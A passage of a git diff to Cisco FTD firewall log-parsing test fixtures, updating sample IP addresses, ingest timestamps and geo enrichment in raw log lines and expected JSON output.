"2021-09-07T12:22:01.768742300Z", + "ingested": "2021-12-09T13:35:10.983229900Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3909,8 +3909,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3940,7 +3940,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -3948,8 +3948,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768744400Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983233900Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3973,8 +3973,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4004,7 +4004,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4012,8 +4012,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768746Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983238Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4037,8 +4037,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4068,7 +4068,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4076,8 +4076,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768747500Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983241500Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4101,8 +4101,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4132,7 +4132,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4140,8 +4140,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768749100Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983246100Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4165,8 +4165,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4196,7 +4196,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4204,8 +4204,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768750600Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983249900Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4229,8 +4229,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4260,7 +4260,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4268,8 +4268,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768752200Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:35:10.983254600Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768755200Z", + "ingested": "2021-12-09T13:35:10.983260400Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-07T12:22:01.768756900Z", + "ingested": "2021-12-09T13:35:10.983266Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4427,8 +4427,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4462,7 +4462,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4471,8 +4471,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768758500Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:35:10.983271800Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-07T12:22:01.768760600Z", + "ingested": "2021-12-09T13:35:10.983277600Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768762200Z", + "ingested": "2021-12-09T13:35:10.983283300Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,15 +4628,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, @@ -4674,14 +4674,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768763800Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:35:10.983289Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4698,8 +4698,8 @@ "ftd": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4712,11 +4712,11 @@ }, "destination": { "nat": { - "ip": "192.0.2.225" + "ip": "192.168.2.225" }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4756,14 +4756,14 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223", - "192.0.2.225" + "192.168.2.223", + "192.168.2.225" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768765300Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:35:10.983294800Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4780,7 +4780,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.225", + "mapped_destination_ip": "192.168.2.225", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4797,9 +4797,9 @@ "nat": { "port": 8080 }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4839,13 +4839,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768766800Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:35:10.983316300Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4863,7 +4863,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4877,8 +4877,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4903,13 +4903,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768768300Z", - "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:35:10.983321600Z", + "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4931,8 +4931,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4959,13 +4959,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768783600Z", - "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:35:10.983326800Z", + "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4987,8 +4987,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -5021,13 +5021,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768786400Z", - "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:35:10.983330700Z", + "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log index c81a41dfb1f..c460849f58e 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log @@ -1,10 +1,10 @@ 2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity 2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity -2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address -2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395 -2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity -2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb -2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity -2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip +2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address +2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395 +2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity +2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb +2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity +2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip 2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 96ccc5b8bbe..6fed9b7418c 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json @@ -62,7 +62,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:07.428840500Z", + "ingested": "2021-12-09T13:35:19.255488700Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:22:07.428852900Z", + "ingested": "2021-12-09T13:35:19.255497100Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -247,24 +247,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 0 }, "source": { @@ -312,7 +315,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -320,8 +323,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:07.428854200Z", - "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", + "ingested": "2021-12-09T13:35:19.255502700Z", + "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, 